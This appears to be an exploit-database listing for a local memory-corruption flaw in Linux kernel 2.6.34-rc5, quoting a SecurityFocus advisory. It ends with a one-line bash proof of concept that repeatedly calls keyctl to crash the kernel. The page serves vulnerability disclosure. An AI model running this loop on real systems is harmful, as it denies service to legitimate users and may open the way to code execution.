header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
Unknown
7.5
CVSS
HIGH
Memory-Corruption
Unknown
CWE
Product Name: Linux Kernel
Affected Version From: 2.6.34-rc5
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Linux
Unknown

Local Memory-Corruption Vulnerability in Linux Kernel

Attackers can exploit this vulnerability to crash the affected computer and potentially run arbitrary code.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39719/info

The Linux kernel is prone to a local memory-corruption vulnerability.

Attackers can exploit this issue to crash the affected computer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

kernel 2.6.34-rc5 is vulnerable.

The following proof-of-concept is available:

for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done